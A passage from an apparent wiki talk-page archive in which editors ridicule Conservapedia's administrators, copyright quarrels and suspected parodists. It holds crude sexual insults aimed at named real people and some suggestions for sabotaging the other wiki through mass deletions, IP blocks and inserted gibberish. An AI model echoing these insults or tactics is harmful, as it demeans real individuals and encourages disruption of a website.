and legal action will be taken." imply that "Halt your vandal attacks" results in "legal action will be taken", whatever those two phrases may mean? ThiehZOYG I edit like Ken! 16:28, 16 April 2010 (UTC) - Technically, I think it can be read as "halting will result in us knowing it's you, and thus legal action being taken," so yeah. It could use a semicolon or period where that first comma is. ~ Kupochama[1][2] 23:30, 16 April 2010 (UTC) - The commas are indifferent separators of clause, and there's no conjunction to suggest this is anything but a list. It's poorly written and ambiguous, in other words, and can be read equally correctly as a string of unrelated events or as a causal series.-- talk 23:38, 16 April 2010 (UTC) Best... Schlaflism... EVAR![edit] I may be behind the times, but did anyone catch this Schlafly classic a week or so back: "There is a high correlation between belief in evolution and liberal political beliefs; that correlation alone demonstrates that evolution cannot be factual." 
(refimg) There's the usual 2 + 2 = 4 stuff in evidence too. Anyone who can say this stuff with a straight face must be seriously unhinged. --JeevesMkII The gentleman's gentleman at the other site 12:20, 16 April 2010 (UTC) - Definitely one for the quote generator, who knows how to edit that? - π 12:35, 16 April 2010 (UTC) - I remember reading that a few days ago, but it never occurred to me how perfectly it fits the quote generator. Tetronian you're clueless 12:37, 16 April 2010 (UTC) - There's also a known correlation between those things and IQ, funny that. theist 14:00, 16 April 2010 (UTC) - I have tried to put it in (check the diffs to see where). K61824ZOYG I edit like Ken! 14:11, 16 April 2010 (UTC) - With such unbeatable logic, I believe the evolution article could be shortened quite a bit. No need for lenghty tirades about evidence for creationism when one Schlafly insight does the job just fine, eh Ken? Vulpius (talk) 19:09, 16 April 2010 (UTC) - Andy's insights are more entertaining if you remove liberals as the demonised party and replace them with Jews, blacks, or the Irish. Helps show Andy's true colours. I imagine him in a bedsheet or a homemade military uniform, blurting out his gibberish while his mum spits on a hankie and tries to clean the drool from his chin. Ask me about your mother 22:35, 16 April 2010 (UTC) - If only his mum weren't just as spittle flecked as he is. All his wingnuttery he learnt at mama's knee. --JeevesMkII The gentleman's gentleman at the other site 00:39, 17 April 2010 (UTC) Not WIGO worthy 'cause it's TK[edit] Images " ... need to be non-copyrighted,..."img Try telling Joaquin, Terry. yummy & honey(or marmalade) 15:14, 16 April 2010 (UTC) - Or even try following his own advice. There was that ice-hockey player photo which he uploaded and which was later removed. But there are many other examples, particularly among his early work at CP. I know there's a picture of a light-house from Wikimedia Commons which was GFDL (later CCSA 3.0) but he just says "from WikiCommons" as if that somehow makes it all OK. Lily Inspirate me. 16:40, 16 April 2010 (UTC) - The trick to getting GFDL images to be removed from Conservapedia is to notify the copyright holder. Have to see where this one goes. --Shagie (talk) 17:31, 16 April 2010 (UTC) Regardless of political ideology?[edit] Really? Miriel will not last long, he/she fails to display a true Conservapedian spirit! :P --Maquissar (talk) 17:09, 16 April 2010 (UTC) Hazarding a guess[edit] Who here want to hazard a guess with me that AngusT is a parodist based on his contribs? LimpWrist (talk) 20:18, 19 April 2010 (UTC) - No matter how conservatively you spin it it is always a mistake to write about anyone or anything liberal or rational on conservapedia. the conservapedia MO seems to center around censoring any conversation on uncomfortable subjects. --Opcn (talk) 20:23, 19 April 2010 (UTC) - A bit early for speculation, he hasn't even made twenty edits. And don't we have some sort of guidepolicy against outing parodists? Internetmoniker (talk) 20:56, 19 April 2010 (UTC) Can a bureaucrat please oversight this section urgently. Thank you Sleuth (talk) 21:16, 19 April 2010 (UTC) - Pardon? yummy & honey(or marmalade) 21:17, 19 April 2010 (UTC) - Don't sorry, we discuss people we're 95% sure are parodists all the time, and they never do anything about them. JacobB is still going strong. If Angus is banhammered it will be for something he does, not us. 
DickTurpis (talk) 21:22, 19 April 2010 (UTC) - Well if this isn't deleted quickly I'm bloody outed lol Sleuth (talk) 21:36, 19 April 2010 (UTC) - You admitted to being AngusT by requesting the deletion of this section. You should've stayed silent. -- Nx / talk 21:41, 19 April 2010 (UTC) - Ooo~ Someone broke Rule #0 of WIGO. (Never talk about possible parodists). I always thought JonB was a parodist, but eh. What do I know besides the person, right? Kettle o' fish 21:52, 19 April 2010 (UTC) - It's largely pointing out the parody that is the problem. As for admitting to being a parodist then I'm Joaquin Martinez and my brother is TK. Lily Inspirate me. 21:57, 19 April 2010 (UTC) Motherf**ker[edit] TK is trolling big nowimg (compare). - π 11:49, 16 April 2010 (UTC) - Pedantry: this should be the one comparing to. K61824Ask me for relationship advice 13:45, 16 April 2010 (UTC) - What I can't understand is why someone (anyone, really) would spend that much time trying to antagonise people. Over the Internet. The existence of TK on CP merely cements my opinion of Andrew Schlafly as the world's biggest putz. --YossarianSpeak, Memory 12:01, 16 April 2010 (UTC) - 'Cos he's a sad fuck who has no other life and gets his jollies by "proving" that he's "better/smarter" by being a bigger bully. The sad thing is that the attention he gets here only feeds his fantasies. What would really hurt him is if we ignored him. Jack Hughes (talk) 12:06, 16 April 2010 (UTC) - Well WIGOs that focus on TK being the saddest cunt in the world started getting voted down a couple of months ago. Also, whenever we have CP boycotts their traffic tends to go down a fair old bit. SJ Debaser 12:09, 16 April 2010 (UTC) - He is a sad fuck there is no doubt, but he is a sad fuck that has violated our copy-right. We only have given license for our work to be redistributed under CC-by-SA 3.0, so unless he acknowledges us and shares-alike he has violated our copy-right. - π 12:16, 16 April 2010 (UTC) - cp:DMCA Agent? larronsicut fur in nocte 12:46, 16 April 2010 (UTC) - Saddest cunt? I got a bollocking yesterday for talking about fucking him, haha Tweetylet's have buttsecks 12:47, 16 April 2010 (UTC) - Oh so that did actually happen? I thought I saw a discussion about "flooding" TK's butthole and had to go and wash my eyes out with bleach. When I got back it had gone. CrundyTalk nerdy to me 12:56, 16 April 2010 (UTC) - Yeah, I asked if people would ride him bareback if the fucked him anally. And if so, would they pull out or flood him. I don't see what's wrong with a little homosexual humour. Tweetylet's have buttsecks 13:02, 16 April 2010 (UTC) - (Crundy goes off to wash his eyes out with bleach again) CrundyTalk nerdy to me 13:14, 16 April 2010 (UTC) - TK knows he's violated our copyright, and he wants us to chase it up. Getting us involved in his latest little shit-flinging escapade would play to his trouble-making agenda. Best to ignore it, but bear in mind that TK will copyvio everything else on RW until he's riled us. Anyway, it doesn't matter - the only people in the entire world who will ever view that article are CP editors (all 6 of them) and us. ONE / TALK 13:05, 16 April 2010 (UTC) - He's obviously trying to bait us into saying anything resembling legal action in order to capitalize on his own legal threats that got him banned, and then got brought up in the larger arena of WP. It's petty and stupid, but it's pretty clear that vindictiveness is well within character. 
--Kels (talk) 13:58, 16 April 2010 (UTC) - Should we direct any legal threats to Andy because he's the owner of the site? K61824Monitoring virgin birth experiment 14:05, 16 April 2010 (UTC) - And I wonder why TK still copies from the vandal site, which he is threatening legal actions against. Shouldn't he assume that the contents of the vandal site consists of material baiting to, if posted on CP, will constitute vandalism? (Someone revert him with the reason "material found on vandal site"/vandalism/parody) ThiehZOYG I edit like Ken! 14:23, 16 April 2010 (UTC) - So Terry Koeckritz plagiarises another article for CP. Just like the UCLA article copied from Wikipedia his mediawiki-formatting skills let him down again. What a sad little man he is. Lily Inspirate me. 16:26, 16 April 2010 (UTC) - We should send a DMCA request to take it down or acknowledge the source. I'll try to remember how to email Trent. The thing is, it violates the copyright of everyone who contributed to the article, by it being copied to a non-CC-BY-SA site, and by it not being acknowledged. What he did is actually against the law. The easy fix is to remove it upon request. ħuman 02:02, 17 April 2010 (UTC) - Simple truth of the matter is if we are aware of a violation and fail to act we risk losing the right to maintain copyright on the work. An informal request to Andrew and Sitegrounds should be enough. I will take care of it. tmtoulouse 02:36, 17 April 2010 (UTC) - Er, no. That's how trademarks work, not copyrights. But yes, there's a lot to be said for asking nicely - David Gerard (talk) 02:51, 17 April 2010 (UTC) The original author of the article submitted it to both sites, so we both hold a unique copyright on the content. The problem arises because CP regularly erases important history through deletion and recreation. It is poor management that is for sure. tmtoulouse 06:23, 17 April 2010 (UTC) - Ah, thanks again. F'ing idiots don't know how to run a website. ħuman 06:45, 17 April 2010 (UTC) - TK knew that all along. We're just fueling the fire here. Keegscee (talk) 07:05, 17 April 2010 (UTC) - Well I guess I owe TK an apology. Sorry for accusing you of plagiarism, TK. - π 07:47, 17 April 2010 (UTC) - Let me assure he was as gracious as one would expect. tmtoulouse 07:56, 17 April 2010 (UTC) - So what we were too lazy or stupid to do was check the deletion log before panicking and stirring the slumbering giant? ħuman 08:20, 17 April 2010 (UTC) - Speaking of deleting, why do we have an article on Schlafly Brewery? Not very on mission. - π 13:59, 17 April 2010 (UTC) - Beer is inherently on-topic. Is the stuff any good? - David Gerard (talk) 20:53, 17 April 2010 (UTC) There's a first for everything[edit] JacobB made me lol!img — Sincerely, Neveruse / Talk / Block 20:27, 16 April 2010 (UTC) - To be fair, no starting entry would be appropriate though. K61824What is NOT going on? 21:49, 16 April 2010 (UTC) - That is amazing... I am not even sure where to begin on that one. --BMcP - Just an astronomy guy 22:01, 16 April 2010 (UTC) - I'm equally amazed. Making fun of Ed is like trying to accuse a thief who walks around with a mask, stripey shirt and a bag marked "swag". Our comments seem somehow unecessary. Well done JacobB! Ask me about your mother 22:44, 16 April 2010 (UTC) - Don't think JabobB has forgotten about this. Keegscee (talk) 22:47, 16 April 2010 (UTC) - Please use the capture tag - someone oversighted that edit since you posted. 23:23, 16 April 2010 (UTC) - Sorry. 
It was from January when Ed asked Jacob for a writing plan. I'm sure it's been captured already. Keegscee (talk) 23:45, 16 April 2010 (UTC) - It's amazing JacobB is still there at all. He was outed ages ago here as a parodist. But of course, blocking him for "liberal vandalism/parody" would, in the CPians minds be an acknowledgement of our existence (though TK's been testing that rule recently on CP). SJ Debaser 00:31, 17 April 2010 (UTC) - Trouble is Poe's Law: a good parodist is indistinguishable from the real thing, so why not let him continue adding "good" stuff until he goes berserk in frustration and then just revert his berserk stuff? yummy & honey(or marmalade) 00:35, 17 April 2010 (UTC) - We know that logic goes through their heads (see the ZB discussions), but it's utterly wrong. Any good parodist will be supplementing the utterly partisan with the utterly false. 00:44, 17 April 2010 (UTC) - Once a fact has been accepted by the Aschlafly it is true and will be defended whatever. There are no false statements on Conservapædia. yummy & honey(or marmalade) 13:34, 17 April 2010 (UTC) Jacob's endgame?[edit] Well, Jacob (and Douglas) finally made it to adminship. Any speculation about his exit strategy? The parody game has to get boring sooner or later, especially with the amount of time he puts in. He hasn't really done anything new lately (at least in public), so what's left? --Benod (talk) 23:16, 16 April 2010 (UTC) - TK's still there, which proves some parodists have the patience and lack of social lives to stay around. Maybe J & D will learn from teh über parodist? –SuspectedReplicant retire me 23:51, 16 April 2010 (UTC) - The question is, what sort of exit strategies are even possible? Pretty much anything can be undone and memory-holed. A truly spectacular exit would need some serious creativity and planning. 00:25, 17 April 2010 (UTC) - The game has changed a bit. Back in the day there was no shortage of bright eyed editors to throw in to the wood-chipper, but right now it's a very limited selection. It's quite clear that Andy doesn't need to be pushed to adopt crazy and unpopular positions, so I'd like to see some serious undermining of a major sysop, such as Ken, Ed, Karajou, or the Mexican bandit. CP deserves to go out with an explosion, and the current slow slide in to mediocrity is really selling the site short. I'd be very impressed if someone managed to drag the Schlafly broodmare in to the game. -- Ask me about your mother 00:33, 17 April 2010 (UTC) - I keep looking at the Active Editors stat. I think if that drops below Ψ, where Ψ is some value in TK's warped mind, he'll out himself. Given that there's variable ψ, which is people who edited but got blocked, (Ψ-ψ) must be approaching the critical value. –SuspectedReplicant retire me 00:51, 17 April 2010 (UTC) - Jacob and Doug have probably put a few gems in the CBP. Other than that, there's not really much they can do other than laugh in Andy's face. The only normal editor worth disposing of now is CPalmer, who has probably only survived this long because he hasn't really edited in the past half-year. The best thing they could do would be to take down TK with them; that way, CP might get some new editors, arguments would be held, and we would get to see the CP sysops in all their war finery once more. EddyP (talk) 01:10, 17 April 2010 (UTC) - I think the ideal endgame would be deleting a crapload of articles (with Andy's approval, of course) and gradually blocking the planet. 
That way, they can at least be sure that they did some irreparable damage to CP before they risk their own heads going after TK or someone else. Tetronian you're clueless 02:45, 17 April 2010 (UTC) - I agree. Block as many IPs as you can, insert as much gibberish as possible and defend it with blocks, maybe as a grand finale, delete and restore all the top 20 articles, thus not actually vandalising, but certainly screwing up Andy's beloved pageviews. Ideally, what every mole desires is entry into the soopah seekrit discussion group, so they can emulate Terry Koeckritz by sharing the secrets with everybody. --PsyGremlinTala! 10:21, 17 April 2010 (UTC) - Actually sorting out their images for copyvio would be awesome. Lily Inspirate me. 10:34, 17 April 2010 (UTC) Point[edit] "For a gov. to not express appreciation or acknowledge an unseen but manifest host conveys that such is unworthy of recognition, or that it is evil for them to do so, or that no host exists." Sayeth Danimg Too true, Danny boy. yummy & honey(or marmalade) 00:17, 17 April 2010 (UTC) - Actually, I don't think he's right at all. Not having a National Prayer Day does not mean that the government's official position is atheistic or agnostic - it just means that they are (correctly, in my opinion), staying away from religion so that people can decide for themselves how/when/who/if they want to worship. Tetronian you're clueless 02:48, 17 April 2010 (UTC) - I think Toasty Toes was just bring snarky about the "no host exists" part. ħuman 03:19, 17 April 2010 (UTC) - If the government is atheistic do the government hospitals become atheist hospitals? --Opcn (talk) 05:56, 17 April 2010 (UTC) - They are, that's why these conservatives wants no universal healthcare — Only Christian hospitals should provide healthcare and they should charge you a fee on top of your tithe. ThiehZOYG I edit like Kenservative! 07:07, 17 April 2010 (UTC) This won't last long[edit] So I'm saving the Stephen Tin Tin Duffyimg reference for posterior. --PsyGremlinZungumza! 13:39, 17 April 2010 (UTC) - I've been waiting for them to get to the porny bits Of the OT. yummy & honey(or marmalade) 13:46, 17 April 2010 (UTC) - Ditto. Especially Levitations and Dorubyourtummyforme with all their talk of "nocturnal emissions". --PsyGremlinSnakk! 13:53, 17 April 2010 (UTC) - Sexy stuff. Better than internet porn. SJ Debaser 13:56, 17 April 2010 (UTC) - Ha! Said by somebody who's never watched dwarf lesbian nun porn. --PsyGremlinRunāt! 14:02, 17 April 2010 (UTC) - Speaking as a dwarf lesbian nun, I find that comment offensive, Psy. yummy & honey(or marmalade) 14:08, 17 April 2010 (UTC) - But... but... it's art! PsyGremlin話しなさい 14:13, 17 April 2010 (UTC) - Heh! Googling dwarf lesbian nun gets 212,000 hits therefore it must be true. yummy & honey(or marmalade) 14:16, 17 April 2010 (UTC) - For all dwarf lesbian nun: if dwarf lesbian nun gets 212,000 hits and cowboy dwarf lesbian evolutionist nun vampire gets about 70,000 hits, then cowboy dwarf lesbian evolutionist nun vampire is approximately 1/3 as true as dwarf lesbian nun. ■ 15:16, 17 April 2010 (UTC) - cowboy dwarf lesbian evolutionist nun vampire. Now there's a film I'll watch. --PsyGremlinParlez! 15:20, 17 April 2010 (UTC) - Someone "translated" Ecclesiastes months ago, but its still languishing in the incomplete list, its like they are allergic to the entire old testament that isn't about how much fags suck, which reminds me, did anyone bother to screen cap me asking Ken where he is blowing these days? 
It took a lot of self control to not write "in a highway rest stop bathroom no doubt" in the edit comment. --Opcn (talk) 17:07, 17 April 2010 (UTC) Well I never...[edit] They seem to have attracted a genuine conservative judging by his blog. He seems to be operating a la Ed, bigging himself up here, or is he just a parodist who's put in extra work? Tweetylet's have buttsecks 14:05, 16 April 2010 (UTC) - Actually, in his blog he used the word 'phenomenol'. Yep, conserva-loon Tweetylet's have buttsecks 14:07, 16 April 2010 (UTC) - ... Phenomenon packaged into booze form? Thieh"6+18=24" 14:17, 16 April 2010 (UTC) - I don't care if he's a conservative or what, but creating a mainspace article about your own personal blog as your 3rd mainspace edit? Ugh.. --GTac (talk) 14:23, 16 April 2010 (UTC) - He should fit right in Tweetylet's have buttsecks 14:26, 16 April 2010 (UTC) - Note he claims to be a Native American. Wonder if he's read Roger's diatribes? yummy & honey(or marmalade) 14:37, 16 April 2010 (UTC) Interesting how he wrote the article in the future tense. Made me think it was brand new, but it's been around a couple months at least. Quickly glancing through it I think I saw only one post with any comments. Why do is expect this is not an encyclopedia-worthy blog? Also, from what I read this guy doesn't seem far-right enough for CP. For instance he admitted that some of the opposition to healthcare reform could be attributed to Conservative Deceit. [Cue spooky music] DickTurpis (talk) 15:41, 16 April 2010 (UTC) - He also uses the word "majorly". The future tense is due to him quoting the header on his blog, I think. And also, glorious dreams of future fame? ħuman 02:13, 17 April 2010 (UTC) - He also seems not to have a mother, but he does have two daddies. ħuman 02:15, 17 April 2010 (UTC) - ...and he also signs his article sections. He definitely has a future at CP. Finally, new blood! ħuman 02:16, 17 April 2010 (UTC) - TK told him to "Scott, please sign all posts."img He's taken it a bit literally. yummy & honey(or marmalade) 02:20, 17 April 2010 (UTC) - I know. Typical parodist tactic is to not sign their first talk page posts, to disguise that they have any wiki-fu. I like the way he ran with it. TK forgot to say "talk page posts". Don't they have a template yet for that? And I always love the "W with a red line through it" references. ħuman 03:13, 17 April 2010 (UTC) - The guy's phonics schpiel is copied completely from WP too - perfect conservapedophile. DeltaStarSenior SysopSpeciationspeed! 14:30, 18 April 2010 (UTC) Trim to fit on one line[edit] Andy really doesn't get how browsers, computers, displays or anything works does he?img yummy & honey(or marmalade) 23:50, 16 April 2010 (UTC) - I'm sorry, Toast (what a ridiculous name!) but your reply scrolled over one line so I was unable to read it. gODspeed –SuspectedReplicant retire me 23:52, 16 April 2010 (UTC) - It is one line for Andy, that is what is important. It is his wishes that count, TK said so. (Aside: If you want to see something bad go to NFL.com with the default Ubuntu fonts. The website must cost millions a year, but text gets chopped of the end of lines unless you are using the Windows defaults.) - π 01:56, 17 April 2010 (UTC) - As a side note, NFL.com doesn't look screwed up with a firefox/default fonts on Fedora 12, or that may be just me. K61824[Talk needed] 07:13, 17 April 2010 (UTC) - Wow, he's using a monitor that small? Even my used flaptop renders the "pre" version on one line. 
But then again, as used flappies go, it's pretty shiny. ħuman 02:23, 17 April 2010 (UTC) - More correctly it's the pixel resolution that counts rather than the dimensions of the monitor. I reckon he must be using one of those Hollywood style monitors where everything is displayed in a font that you can read from across the street. Lily Inspirate me. 03:53, 17 April 2010 (UTC) - True indeed. A friend of mine has a 42" or so monitor, and when he goes into command line mode each character is about 2" tall. ħuman 04:01, 17 April 2010 (UTC) - He is using too many words to describe the word "concise" in the CP sense. ThiehCP≠Child Porn? 07:13, 17 April 2010 (UTC) - Maybe that's where his obsession with conciseness comes from. It's nothing about being able to express an idea in as little words as possible, it's just that he's using some ridiculous resolution and doesn't like scrolling down a talk page. X Stickman (talk) 15:39, 17 April 2010 (UTC) - Y'all remember when he uploaded a line drawing for one of his economics 'lectures' as a 6000x4000 jpeg? For an electrical engineer (and a programmer of course!) he really doesn't have a fucking clue. Good spot Toasty. DeltaStarSenior SysopSpeciationspeed! 16:49, 18 April 2010 (UTC) ...and now it won't fit on one line...[edit] ...because Andy has put a massive imageimg on the left side of the main page. No sense of what a good layout is. RationalwikiwikiUndergroundResistor (talk) 19:25, 17 April 2010 (UTC) - "No sense of what a good layout is." Fixed that for you. --Kels (talk) 20:25, 17 April 2010 (UTC) - Also, ruthless censorship of controversial political cartoons. --wwwwolf (barks/growls) 23:44, 17 April 2010 (UTC) Ken logic[edit] Back at his best, Christian channels on YouTube being shut down for copy-right violation is a blow against atheism.img I will never cease to wonder what goes on inside his head. He must have some kind of special prism that reflects and refracts what he is reading so that it always comes out as "you are right Ken". - π 01:22, 18 April 2010 (UTC) - It seems to me that what Ken is really saying is this: Christian YouTube channels are being shut down because of copyright issues. The atheist channels are saying nothing about it. Therefore, they are the ones doing the censoring. QED. Tetronian you're clueless 01:17, 18 April 2010 (UTC) - I've never heard any atheist say "atheist" that much in a sentence. Holy (haha) balls. – Nick Heer 03:18, 18 April 2010 (UTC) - While they've always portrayed reality as a neverending string of conservative victories, "Belief in God is once again triumphant. Conservapedia has learned that Christian channels at YouTube are systematically being shut down at YouTube..." is probably the ballsiest move yet. Chapeau, Ken! Röstigraben (talk) 07:43, 18 April 2010 (UTC) - "The atheist community at YouTube demonstrates the utter futility and weakness of the atheism." Snigger. Lily Inspirate me. 09:13, 18 April 2010 (UTC) - Hey, Ken. Maybe you can strike a blow against the atheism by posting so many copyrighted Hitler pictures on Conservapedia that it gets shut down. In other news, I am impressed by the "TheCristianThinker"'s ability to spell "Christian." Thinky. --JeevesMkII The gentleman's gentleman at the other site 09:28, 18 April 2010 (UTC) - Excuse me Jeeves, but I fixed your sentence. Lily Inspirate me. 
12:29, 18 April 2010 (UTC) - I like how up until this point Ken has ignored numerous DMCA and votebotting instances against atheist YouTubers, but the second a couple of Christians get shutdown he pisses himself over it. Ken's just such an unusual bloke. Even in the Zeuglodon Blue files. SJ Debaser 12:27, 18 April 2010 (UTC) - I like the ones where he posts a rambling screed, everybody ignores him and he goes on to post about 7 replies to his own mail. Very strange indeed. Still, it's good to see his writing style is as bad off-wiki as on. --PsyGremlinKhuluma! 12:30, 18 April 2010 (UTC) - What is ironic is that I discovered about some of the Christian channels being falsely DMCAed through the atheist DPRJones channel when he called for people's support for those same Christians through mirroring their videos. Ken though likely ignored that as soon as he realized it would contradict his stereotyping of atheists. Of course there was a string of false DMCAs against atheist channels not too long ago, and then there was the story of the Christian Venomfangx, who got caught and had to make a public apology. --BMcP - Just an astronomy guy 17:16, 18 April 2010 (UTC) What the fuck was this?[edit] I can see why he took it downimg--Opcn (talk) 06:28, 18 April 2010 (UTC) - i can't even see where that is in the article, he might be the one with delusional "thinking". - π 06:33, 18 April 2010 (UTC) - I can't understand what Conservative is saying. Someone translate it into English, please. Rodlen (talk) 06:35, 18 April 2010 (UTC) - "If I am not mistaken, I believe I am the principle contributor of these articles" - Bloody right Ken. They've been locked away from ordinary editors pretty much from day 1. Lily Inspirate me. 07:51, 18 April 2010 (UTC) - Oooh me me me me me! What is in that man's mind? Ummm, pudding? Gravel? The foam bits from earbud headphones? Eraser tips, OCD pills, watermelon seeds, foam. 14:02, 18 April 2010 (UTC) - Small sections of bicycle chain. ħuman 14:40, 18 April 2010 (UTC) That's disgusting. rational ghey (talk) 18:41, 18 April 2010 (UTC) - So, basically, Ken would be one of the few survivors of the upcoming zombie apocalypse. NOOOOOOOOOOOOOOOOOO! Rodlen (talk) 18:42, 18 April 2010 (UTC) - So that's the "end of atheism/evolution on internet" he's always been foaming about, zombie apocalypse? Vulpius (talk) 19:06, 18 April 2010 (UTC) I tip my hat[edit] to DouglasA. The scale on which he is destroying articles is unlike that of any parodist seen before; and he's getting away with it too. Truly he is among the masters. EddyP (talk) 15:20, 18 April 2010 (UTC) - He is quite skillful, but it's not as hard as it used to be because almost nothing is going on at CP these days. Plus, right now it's Sunday morning EST, so Andy and most of his gang are probably at church. Tetronian you're clueless 15:23, 18 April 2010 (UTC) - Unless I'm missing something, it looks like he's just deleting articles that aren't on par with conservapedia's mission. And he just translated a bible verse. Senator Harrison (talk) 15:52, 18 April 2010 (UTC) - Most of those articles were already marked for deletion. They were still up because Conservapedians are lazy by nature - I've seen stuff marked for "speedy deletion" still up months later. Yeah, it's amusing that DouglasA deleted almost 150 articles in a week, but it was all stuff that CP wanted deleted. - I do find it interesting how selective they're being with the anime articles. 
Only a few of them were marked for deletion, ironically the more widely-known series. I'm honestly surprised that they didn't just nuke the whole section after Jessica got the boot. Colonel of Squirrels白山羊不山羊。商讨。 16:07, 18 April 2010 (UTC) - My favorite one: cp:HeadOn. Tetronian you're clueless 16:10, 18 April 2010 (UTC) - I thought that CP's mission was to become a general encyclopaedia and destroy WP utterly. EddyP (talk) 16:15, 18 April 2010 (UTC) - It is, but I seem to remember Andy saying that he didn't want all the pop-culture and "gossip" that takes up such a sizable fraction of WP's main space. Tetronian you're clueless 16:32, 18 April 2010 (UTC) - As a large percentage of net searches will be for trivia, they'll miss out on a lot of traffic. What was that revolting Canadian dish that we were number one for, began with "P" if I remember right? I believe it brought us several new members. yummy & honey(or marmalade) 16:55, 18 April 2010 (UTC) - Just when I thought Andy couldn't get any more blind. Sleuth (talk) 17:18, 18 April 2010 (UTC) - Conservapedia's law dictates that people will stop having fun as time goes on. --Opcn (talk) 17:20, 18 April 2010 (UTC) - Pretty sure the dish was donair sauce. Do we have an article on poutine at all? --Kels (talk) 17:32, 18 April 2010 (UTC) - My mistake, Kels, it was Donair sauce. Fun:Poutine Recipe:Donair sauce yummy & honey(or marmalade) 17:35, 18 April 2010 (UTC) - No offense, Canadians, but Poutine looks vile. Tetronian you're clueless 17:37, 18 April 2010 (UTC) - I like poutine. Also, that is definitely a much better Conservapedia's Law, Opcn. Rodlen (talk) 17:42, 18 April 2010 (UTC) - We just have to hope that Andy's hubris will give birth to another pet project. Tetronian you're clueless 17:43, 18 April 2010 (UTC) - (UD) Fun = Hollywood values; Fun = sex; Fun = Drugs; Fun = Not doing what your elders & betters tell you; Fun = Unchristian; Fun = Liberal; Fun = "I don't have fun, why should you"; etc etc etc. Ergo Fun =/= Conservapedian. yummy & honey(or marmalade) 17:53, 18 April 2010 (UTC) Ken's Sense Of Humour[edit] This carimg is apparently comedic to Ken. I don't understand. At all. Rodlen (talk) 20:08, 18 April 2010 (UTC) - And now he links to Hitwin. That, I don't find as surprising. Rodlen (talk) 20:10, 18 April 2010 (UTC) - Methinks that "Gishmobile" is not funny in the way intended by Ken. I like the "God bless america" thing on the front bumper. Perhaps the driver is hoping that God will be crossing the road in front of them and think "Wow, that's a great idea! I'll bless America!"- Ask me about your mother 20:13, 18 April 2010 (UTC) - (EC)I think the picture's funny, but probably for different reasons to Ken. The yank (obvious due to his back to front baseball cap) is shouting and pointing at a car which says, "Evolution? The Fossils Say No!" while the front bumper has the Stars and Stripes with a bald eagle and the slogan "God Bless America!" It's a kinda "YEAH! WE DON'T NEED NO DAMN SCIENCE! USA! NUMBER ONE!!" which highlights the idiocy of the American right-wing. (No offence there, America.) SJ Debaser 20:17, 18 April 2010 (UTC) - Ooh, we now have Stalwin too! Rodlen (talk) 20:19, 18 April 2010 (UTC) - He thinks it's funny because it is his firm belief that fossils say the earth is 6,000 years old or whatever. And they say no. And that's funny to the boyman. rational ghey (talk) 20:22, 18 April 2010 (UTC) - [1]img Here is the actual car if you don't want to search user:Conservative's page for ten minutes.
Mei (talk) 20:34, 18 April 2010 (UTC) - Wow I Just noticed the "evolution is a fairy tale for grown-ups." .. WTF?! rational ghey (talk) 20:42, 18 April 2010 (UTC) - I just noticed Ken's page, and after a small nap to regain my senses, I had a bit of a laugh. He has a link to the classic Abbott and Costello routine about baseball. He has it named "Who is on first?" Small and stupid, I know, but still funny. SirChuckBGentoo Penguins is the best kind of Penguin 23:47, 18 April 2010 (UTC) Mass vandalism wave[edit] Check the CP recent changes. 'Nuff said Tweetylet's have buttsecks 18:22, 17 April 2010 (UTC) - This must be the most edits they've had in a day for a few months now. EDIT: are all the admins at church or something? EddyP (talk) 18:41, 17 April 2010 (UTC) - What percentage of their edit per article count is vandalism? --Opcn (talk) 18:49, 17 April 2010 (UTC) - Figures its on a saturday when all the kids are home from school.Senator Harrison (talk) 19:17, 17 April 2010 (UTC) - Figures it's on a day when I was in NYC all day. I missed creating an account and getting in on the reversions. Kix, they're not just for kids~ 21:54, 19 April 2010 (UTC) Abortion and Hitler[edit] Obvious parody is lame. -- Nx / talk 20:25, 18 April 2010 (UTC) - I know, but it remains there, as with the Obama/Osama controversy. I wrote that WIGO (I know, I have an amazing passion for creativity) and I'm not expecting much. SJ Debaser 20:27, 18 April 2010 (UTC) - Just remember that the admins requested it in their anti-abortion project. Rodlen (talk) 20:30, 18 April 2010 (UTC) - I was gonna say that the article was a good thing to WIGO but the WIGO is lame, but you acknowledged that already. Good for you, SJ. Senator Harrison (talk) 20:38, 18 April 2010 (UTC) - Is it obvious parody? It was Ken himself who requested such an article. DeltaStarSenior SysopSpeciationspeed! 21:16, 18 April 2010 (UTC) - True, but both editors who worked on that article reek of parodist. Of course, I admit that it's sometimes hard to tell. Colonel of Squirrels白山羊不山羊。商讨。 21:18, 18 April 2010 (UTC) - On a related note, I have a hard time understanding Ken's relationship with parody. Sometimes it looks like he recognizes parody for what it is, but then he'll go on to expand on the parody and take it seriously. Is he just that out of touch? (That's a rhetorical question, by the way.) Tetronian you're clueless 21:28, 18 April 2010 (UTC) - One more thing: I've been ignoring CP's latest project, so I didn't notice this until today, but Ken is alleging that they'll be vetting all the new articles. It's like they knew that they were inviting parodists to the party and decided to draw a line in the sand. My guess is that it won't matter. Ken's going to half-ass this like he does everything else, and they'll never find all the vandalism. Colonel of Squirrels白山羊不山羊。商讨。 21:36, 18 April 2010 (UTC) Thisimg made me laugh. Nice new crop of parodists over there. 21:32, 18 April 2010 (UTC) - Though that is parody, I've heard that argument used seriously on a number of occasions, including by my own father. Tetronian you're clueless 21:49, 18 April 2010 (UTC) - 'What do liberals that oppose wiretapping have to hide from the government?' -> Their dignity. Mei (talk) 21:51, 18 April 2010 (UTC) - Conservative reply: "But the government doesn't care about people's personal information, so they won't do anything with it unless it constitutes a security risk" (actual quote from a conservative friend of mine). 
Tetronian you're clueless 21:54, 18 April 2010 (UTC) - IT BURNS >__________________< Mei (talk) 21:56, 18 April 2010 (UTC) - My favorite part of that wiretap article is definitely the one source: it involves the arrest of police who did drugs, through the use of a wiretap. To justify the entire article. Rodlen (talk) 23:02, 18 April 2010 (UTC) - Update ♥ K e n D o l l ♥ gives it his blessingimg--Opcn (talk) 04:33, 19 April 2010 (UTC) - It seems that this has suddenly become Conservative's favorite article on the wiki, seeing how he restored it post-deletion for a reason that isn't real, and has turned it into a section of the main Abortion article, and has edited the Abortion & Hitler article many times. Whoa. Rodlen (talk) 02:07, 20 April 2010 (UTC) Poe's paradox[edit] An astonishing fact that I've discovered recently is that even parody by a known parodist can have a nauseating effect. Just take JacobB for example: we all know that he is a parodist, same thing with DouglasAdams, yet when JacobB stole the work of another editor people were legitimately upset about it. I reread Andy's letter to PNAS and was pissed off at it, but it didn't nullify any of my anger knowing that DinsdaleP was permabanned when he got fed up with parody and started simply trolling. I'm having a hard time sussing out whether it is just another mental disconnect that causes me to enjoy and revile these people, or if it is because, as Poe's Law dictates, parody is by and large the same to read as fundamentalism. I remember back in 2003 thinking that Fox News was ridiculous and feeling like most of 